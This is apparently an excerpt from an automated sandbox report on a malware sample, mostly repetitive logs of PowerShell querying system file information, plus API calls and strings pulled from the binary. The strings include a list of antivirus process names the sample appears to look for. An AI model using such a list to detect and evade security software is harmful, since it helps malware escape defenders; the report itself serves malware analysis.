                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0061A76C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,0_2_0061A76C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00601070 GetSystemTimeAsFileTime,FileTimeToSystemTime,0_2_00601070
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03085D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_03085D22
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_004270EC GetVersionExW,0_2_004270EC
                      Source: leBwnyHIgx.exeBinary or memory string: acs.exe
                      Source: leBwnyHIgx.exeBinary or memory string: vsserv.exe
                      Source: leBwnyHIgx.exeBinary or memory string: avcenter.exe
                      Source: leBwnyHIgx.exeBinary or memory string: kxetray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: cfp.exe
                      Source: leBwnyHIgx.exeBinary or memory string: avp.exe
                      Source: leBwnyHIgx.exeBinary or memory string: KSafeTray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: 360Safe.exe
                      Source: leBwnyHIgx.exeBinary or memory string: rtvscan.exe
                      Source: leBwnyHIgx.exeBinary or memory string: 360tray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: ashDisp.exe
                      Source: leBwnyHIgx.exeBinary or memory string: TMBMSRV.exe
                      Source: leBwnyHIgx.exeBinary or memory string: 360Tray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: avgwdsvc.exe
                      Source: leBwnyHIgx.exeBinary or memory string: AYAgent.aye
                      Source: leBwnyHIgx.exeBinary or memory string: QUHLPSVC.EXE
                      Source: leBwnyHIgx.exeBinary or memory string: RavMonD.exe
                      Source: leBwnyHIgx.exeBinary or memory string: Mcshield.exe
                      Source: leBwnyHIgx.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
